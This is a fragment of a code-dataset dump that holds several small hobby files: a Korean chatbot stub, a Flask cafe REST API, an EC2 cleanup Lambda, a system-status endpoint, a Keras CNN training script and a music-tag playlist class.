"call"}, {"api_name": "theano.tensor", "line_number": 55, "usage_type": "name"}, {"api_name": "theano.tensor.log", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 62, "usage_type": "name"}, {"api_name": "theano.tensor.diag", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor.nlinalg.norm", "line_number": 63, "usage_type": "call"}, {"api_name": "theano.tensor.nlinalg", "line_number": 63, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 74, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 74, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 77, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 77, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 80, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 80, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 83, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 83, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 86, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 86, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 89, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 89, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 92, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 92, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 95, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 95, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 98, "usage_type": "call"}, {"api_name": 
"theano.tensor", "line_number": 98, "usage_type": "name"}, {"api_name": "theano.scan", "line_number": 154, "usage_type": "call"}, {"api_name": "pymc3.distributions.Continuous", "line_number": 166, "usage_type": "name"}, {"api_name": "pymc3.distributions.Continuous.__init__", "line_number": 236, "usage_type": "call"}, {"api_name": "pymc3.distributions.Continuous", "line_number": 236, "usage_type": "name"}, {"api_name": "theano.tensor.as_tensor_variable", "line_number": 240, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "theano.tensor.vector", "line_number": 260, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 260, "usage_type": "name"}, {"api_name": "theano.tensor.diag", "line_number": 261, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 261, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 270, "usage_type": "call"}, {"api_name": "theano.tensor.matrix", "line_number": 272, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 272, "usage_type": "name"}, {"api_name": "theano.function", "line_number": 274, "usage_type": "call"}, {"api_name": "theano.Mode", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 277, "usage_type": "call"}, {"api_name": "pymc3.Model", "line_number": 281, "usage_type": "call"}, {"api_name": "pymc3.Normal", "line_number": 284, "usage_type": "call"}, {"api_name": "pymc3.HalfStudentT", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "pymc3.sample_approx", "line_number": 299, "usage_type": "call"}]} +{"seq_id": "31780394", "text": "import sqlite3\ndef chat(msg):\n chat_message = str(msg)\n answer = \"제가 아직 모르는 말입니다.\"\n conn = sqlite3.connect('chat.db')\n conn = cur = conn.cursor()\n cur.execute(\"select * from chat\")\n rows = cur.fetchall()\n for row in rows:\n if row[0] == chat_message:\n answer = row[1]\n return(answer)\ndef teach(q,a):\n search = chat(q)\n if search != \"제가 아직 모르는 말입니다.\":\n return(\"이미 학습된 말입니다.\")\n #20180905 만들다 말음\n\nif __name__ == '__main__':\n mode = 2\n inputstr = input(\"관리자 모드입니다. - 번호를 입력하세요. \\n1. 데이터베이스 추가\\n2. 
채팅 테스트\")\n if inputstr == 1: mode = 1\n if inputstr == 2: mode = 2\n if not inputstr == 1 or inputstr == 2:\n print(\"잘못된 명령입니다.\")\n exit()\n if mode == 1:\n while(True):\n in_str = input(\"채팅 모드입니다. - 채팅을 입력해보세요. - 나가기 \\q\")\n if in_str == \"\\q\":\n print(\"종료합니다.\")\n else:\n chat(in_str)\n", "sub_path": "chat_module.py", "file_name": "chat_module.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "268278118", "text": "from logging import error\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy, sqlalchemy\nimport random\n\n\napp = Flask(__name__)\nAPI_KEY = \"SecretKey\"\n\n##Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n#Cafe TABLE Configuration\nclass Cafe(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n# All records fetched from DB\ncafes = db.session.query(Cafe).all()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\",cafes=cafes)\n\n# gets random coffee place\n@app.route(\"/random\") \ndef random_cafe():\n random_cafe = random.choice(cafes)\n return jsonify(\n cafe={\n \"can_take_calls\":random_cafe.can_take_calls,\n \"coffee_price\":random_cafe.coffee_price,\n \"has_sockets\":random_cafe.has_sockets,\n \"has_toilet\":random_cafe.has_toilet,\n \"has_wifi\":random_cafe.has_wifi,\n \"id\":random_cafe.id,\n \"img_url\":random_cafe.img_url,\n \"location\":random_cafe.location,\n \"map_url\":random_cafe.map_url,\n \"name\":random_cafe.name,\n \"seats\":random_cafe.seats\n }\n )\n\n# gets all the coffee place from DB\n@app.route(\"/all\")\ndef all_cafe():\n cafe_list = []\n\n for cafe in cafes:\n cafe_ = {\n \"can_take_calls\":cafe.can_take_calls,\n \"coffee_price\":cafe.coffee_price,\n \"has_sockets\":cafe.has_sockets,\n \"has_toilet\":cafe.has_toilet,\n \"has_wifi\":cafe.has_wifi,\n \"id\":cafe.id,\n \"img_url\":cafe.img_url,\n \"location\":cafe.location,\n \"map_url\":cafe.map_url,\n \"name\":cafe.name,\n \"seats\":cafe.seats\n }\n cafe_list.append(cafe_)\n\n return jsonify(cafe = cafe_list)\n\n# searches for a coffee place at mentioned location\n@app.route(\"/search\")\ndef search():\n loc = request.args.get(\"loc\") \n\n cafe_ = Cafe.query.filter_by(location=loc).first()\n\n try:\n return jsonify(\n cafe={\n \"can_take_calls\":cafe_.can_take_calls,\n \"coffee_price\":cafe_.coffee_price,\n \"has_sockets\":cafe_.has_sockets,\n \"has_toilet\":cafe_.has_toilet,\n \"has_wifi\":cafe_.has_wifi,\n \"id\":cafe_.id,\n \"img_url\":cafe_.img_url,\n \"location\":cafe_.location,\n \"map_url\":cafe_.map_url,\n \"name\":cafe_.name,\n \"seats\":cafe_.seats\n }\n )\n except AttributeError:\n return jsonify(\n error=\"Sorry, we don't have cafe at that location.\"\n 
# All records fetched from DB\ncafes = db.session.query(Cafe).all()\n\n@app.route(\"/\")\ndef home():\n    return render_template(\"index.html\",cafes=cafes)\n\n# gets a random coffee place\n@app.route(\"/random\")\ndef random_cafe():\n    random_cafe = random.choice(cafes)\n    return jsonify(\n        cafe={\n            \"can_take_calls\":random_cafe.can_take_calls,\n            \"coffee_price\":random_cafe.coffee_price,\n            \"has_sockets\":random_cafe.has_sockets,\n            \"has_toilet\":random_cafe.has_toilet,\n            \"has_wifi\":random_cafe.has_wifi,\n            \"id\":random_cafe.id,\n            \"img_url\":random_cafe.img_url,\n            \"location\":random_cafe.location,\n            \"map_url\":random_cafe.map_url,\n            \"name\":random_cafe.name,\n            \"seats\":random_cafe.seats\n        }\n    )\n\n# gets all the coffee places from the DB\n@app.route(\"/all\")\ndef all_cafe():\n    cafe_list = []\n\n    for cafe in cafes:\n        cafe_ = {\n            \"can_take_calls\":cafe.can_take_calls,\n            \"coffee_price\":cafe.coffee_price,\n            \"has_sockets\":cafe.has_sockets,\n            \"has_toilet\":cafe.has_toilet,\n            \"has_wifi\":cafe.has_wifi,\n            \"id\":cafe.id,\n            \"img_url\":cafe.img_url,\n            \"location\":cafe.location,\n            \"map_url\":cafe.map_url,\n            \"name\":cafe.name,\n            \"seats\":cafe.seats\n        }\n        cafe_list.append(cafe_)\n\n    return jsonify(cafe = cafe_list)\n\n# searches for a coffee place at the given location\n@app.route(\"/search\")\ndef search():\n    loc = request.args.get(\"loc\")\n\n    cafe_ = Cafe.query.filter_by(location=loc).first()\n\n    try:\n        return jsonify(\n            cafe={\n                \"can_take_calls\":cafe_.can_take_calls,\n                \"coffee_price\":cafe_.coffee_price,\n                \"has_sockets\":cafe_.has_sockets,\n                \"has_toilet\":cafe_.has_toilet,\n                \"has_wifi\":cafe_.has_wifi,\n                \"id\":cafe_.id,\n                \"img_url\":cafe_.img_url,\n                \"location\":cafe_.location,\n                \"map_url\":cafe_.map_url,\n                \"name\":cafe_.name,\n                \"seats\":cafe_.seats\n            }\n        )\n    except AttributeError:\n        return jsonify(\n            error=\"Sorry, we don't have a cafe at that location.\"\n        ), 404\n\n# updates the record of a coffee place, looking it up by id\n@app.route(\"/update-price/<id>\")\ndef update_price(id):\n    updated_price = request.args.get(\"new_price\")\n    api_key = request.args.get(\"api_key\")\n\n    if api_key == API_KEY:\n        try:\n            price_update = Cafe.query.get(int(id))\n            price_update.coffee_price = updated_price\n            db.session.commit()\n            return jsonify(\n                success=\"Successfully updated the price\"\n            ), 200\n        except AttributeError:\n            return jsonify(\n                error={\n                    \"Not found\": \"Sorry, no coffee house exists with that id\"\n                }\n            ), 404\n    else:\n        return jsonify(error=\"Invalid API Key\")\n\n@app.route(\"/report-closed/<id>\")\ndef delete_record(id):\n    api_key = request.args.get(\"api_key\")\n    if api_key == API_KEY:\n        try:\n            cafe_ = Cafe.query.get(int(id))\n            db.session.delete(cafe_)\n            db.session.commit()\n\n            return jsonify(success = \"Successfully deleted the record\")\n        except sqlalchemy.orm.exc.UnmappedInstanceError:\n            return jsonify(\n                error = {\n                    \"Not Found\": \"Sorry, the id isn't valid.\"\n                }\n            )\n    else:\n        return jsonify(\n            error = {\n                \"Not Found\": \"Sorry, the api key isn't valid.\"\n            }\n        )\n\nif __name__ == '__main__':\n    app.run(debug=True)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.sqlalchemy.orm", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.sqlalchemy", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 148, "usage_type": 
"call"}]} +{"seq_id": "285629200", "text": "from __future__ import print_function\nimport boto3\nimport logging\nimport datetime\nfrom datetime import date\n\n\ndef lambda_handler(event, context):\n \n\t#CHANGE \n regions = [\"region1\", \"region2\"]\n \n for region in regions:\n ec2 = boto3.resource('ec2', region_name=region)\n ec2client = boto3.client('ec2', region_name=region)\n response = ec2client.describe_instances()\n # print(response)\n \n\t\t#CHANGE \n my_images = ec2.images.filter(Owners=[ACCOUNT_ID])\n for image in my_images:\n for tags in image.tags:\n if tags[\"Key\"] == 'RemoveOn':\n #If today is the removal date, terminate it\n if tags['Value'] == date.today().strftime('%d-%m-%Y'):\n print(\"Deregistering \" + image.id + \" in \" + region)\n ec2client.deregister_image(ImageId=image.id)\n \n for instance in ec2.instances.all():\n for tags in instance.tags:\n #If instance has a specific removal date\n if tags[\"Key\"] == 'RemoveOn':\n #If today is the removal date, terminate it\n if tags['Value'] == date.today().strftime('%d-%m-%Y'):\n print(\"Terminating EC2 \" + instance.id + \" in \" + region)\n ec2.Instance(instance.id).stop()\n #print(ec2.Instance(instance.id).stop())\n", "sub_path": "EC2Cleanup.py", "file_name": "EC2Cleanup.py", "file_ext": "py", "file_size_in_byte": 1443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "boto3.resource", "line_number": 14, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "16411001", "text": "import socket, json, psutil, multiprocessing, requests\r\n\r\nfrom flask import Flask, jsonify\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n hostname = socket.gethostname()#Get hostname\r\n IP = socket.gethostbyname(hostname)#Get IP Address\r\n CPU = multiprocessing.cpu_count()\r\n RAM = psutil.virtual_memory().total / (1024.0 ** 3)\r\n return jsonify({'Hostanme' : hostname,\r\n 'IP Address' : IP,\r\n 'Amount of CPU Cores' : CPU,\r\n 'RAM in GBs' : round(RAM,3)\r\n })\r\n\r\nif __name__ == '__main__':\r\n app.run(host='127.0.0.1',port=8080, debug=True)\r\n", "sub_path": "Flask_Server.py", "file_name": "Flask_Server.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 9, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 10, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "107050691", "text": "\n# coding: utf-8\n\n# In[ ]:\n\n\nimport keras.models\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import Adadelta, adam\nfrom 
keras.callbacks import ModelCheckpoint\nimport numpy as np\nfrom keras import regularizers\nfrom keras.constraints import maxnorm\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\nX = np.load('influ_selected_model2_train_input.npy')\nY = np.load('influ_selected_model2_train_outputdim2.npy')\n\n\n# In[ ]:\n\n\n#X_test = np.load(\"/Users/TN/Desktop/influ_selected_model2_test_input.npy\")\n#Y_test = np.load(\"/Users/TN/Desktop/influ_selected_model2_test_outputdim2.npy\")\n\n\n# In[ ]:\n\n\nK.image_data_format()\n\n\n# In[ ]:\n\n\nconv_layer = [ \n # convolution and then pooling\n Conv2D(20, (7, 7), input_shape=(1024,1360,1), name='first_conv_layer',padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(10, 10), padding='valid'),\n\n # convolution and then pooling\n Conv2D(25, (5, 5), name='second_conv_layer', padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(6, 6), padding='valid'),\n \n # convolution and then pooling\n Conv2D(30, (3, 3), name='third_conv_layer', padding='valid'),\n Activation('relu'),\n MaxPooling2D(pool_size=(6, 6), padding='valid')\n]\n\nfc_layer = [\n # flatten and connect with three fully connected layer\n Flatten(),\n Dense(100, name='fc_layer_100_1'),\n Activation('sigmoid'),\n Dense(100, name='fc_layer_100_2',kernel_constraint= maxnorm(1.)),\n Activation('sigmoid'),\n Dense(100, name='fc_layer_100_3',kernel_regularizer=regularizers.l2(0.01)),\n Activation('sigmoid'),\n \n # conneted with smaller fully connected layer\n # with the same number of neurons as the number of classes\n Dense(2, name='fc_layer_2'),\n Activation('softmax')\n]\n\n\n# In[ ]:\n\n\nmodel = Sequential(conv_layer + fc_layer)\nmodel.compile(loss=\"binary_crossentropy\",\n optimizer=adam(lr=0.0001),\n metrics=['accuracy'])\n\n\n# In[ ]:\n\n\nmodel.summary()\n\n\n# In[ ]:\n\n\nfilepath=\"influ_0816_filter-{epoch:02d}-acc_{acc:.2f}.hdf5\"\ncheckpoint = ModelCheckpoint(filepath, monitor='acc', verbose=1, save_best_only=True, save_weights_only=True, mode='auto')\ncallbacks_list = [checkpoint]\n\n\n# In[ ]:\n\n\nhistory = model.fit(X, Y, batch_size=15, epochs=1200, callbacks=callbacks_list, verbose=1, validation_split=0.2, shuffle=True)\n\n\n# In[ ]:\n\n\nmodel.save_weights('0816_influ_filter_model2.h5')\nmodel.save('0816_influ_filter_model_2')\n\n\n# In[ ]:\n\n\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.title(\"model 2 loss\")\n\nplt.ylabel(\"loss\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train\",\"test\"],loc=\"upper left\")\n\nplt.savefig(\"model_2_loss\")\n\nplt.savefig(\"model_2_loss.pdf\")\n\nplt.close('all')\n\n# In[ ]:\n\n\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.title(\"model 2 acc\")\n\nplt.ylabel(\"acc\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train\",\"test\"],loc=\"upper left\")\n\nplt.savefig(\"model_2_acc\")\n\nplt.savefig(\"model_2_acc.pdf\")\n\nplt.close('all')\n\n\n\n\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.title(\"model 2 \")\n\nplt.ylabel(\"loss/acc\")\n\nplt.xlabel(\"epoch\")\n\nplt.legend([\"train_loss\",\"test_loss\",\"train_acc\",\"test_acc\"],loc=\"upper left\")\n\nplt.savefig(\"model_2\")\n\nplt.savefig(\"model_2.pdf\")\n\nplt.close('all')\n\n\n\n\n", "sub_path": "Training2/influ_CPE_0816_training2.py", "file_name": "influ_CPE_0816_training2.py", "file_ext": "py", "file_size_in_byte": 3545, "program_lang": "python", "lang": "en", "doc_type": "code", 
"dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.backend.image_data_format", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 38, "usage_type": "name"}, {"api_name": "keras.layers.Conv2D", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.constraints.maxnorm", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.layers.Activation", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.optimizers.adam", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "457463419", "text": "from mutagen.easyid3 import EasyID3\nfrom musicmodifier.utilities import file_iterator\nfrom musicmodifier.artist import 
Artist\nfrom musicmodifier.album import Album\nfrom musicmodifier.track import Track\n\n\nclass Playlist:\n _counter = 0\n\n def __init__(self, directory):\n self._name = 'playlist'\n self._directory = directory\n self._all_artists = []\n Playlist._counter += 1\n self._create_playlist()\n\n def _create_playlist(self):\n file_paths = file_iterator(self._directory)\n for path in file_paths:\n self._create_info(path)\n\n def _create_info(self, path):\n audio = EasyID3(path)\n title = ''.join(audio['title'])\n artist = ''.join(audio['artist'])\n album = ''.join(audio['album'])\n track_info = {'title': title, 'artist': artist, 'album': album, 'path': path}\n self._create_artist(track_info)\n\n def _create_artist(self, track_info):\n artist_name = track_info.get('artist')\n artist = self._check_exists(artist_name, self.get_artists())\n if not artist:\n artist_path = track_info.get('path').rsplit('\\\\', 2)[0]\n artist = Artist(artist_name, artist_path)\n self._add_artist(artist)\n self._create_album(track_info, artist)\n\n def _create_album(self, track_info, artist):\n album_name = track_info.get('album')\n album = self._check_exists(album_name, artist.get_albums())\n if not album:\n album_path = track_info.get('path').rsplit('\\\\', 1)[0]\n album = Album(album_name, album_path)\n artist.add_album(album)\n self._create_track(track_info, album)\n\n def _create_track(self, track_info, album):\n track_name = track_info.get('title')\n track = self._check_exists(track_name, album.get_tracks())\n if not track:\n track_path = track_info.get('path')\n track = Track(track_name, track_path)\n album.add_track(track)\n\n def _add_artist(self, artist):\n self._all_artists.append(artist)\n\n def get_name(self):\n return self._name\n\n def set_name(self, name):\n self._name = name\n\n def 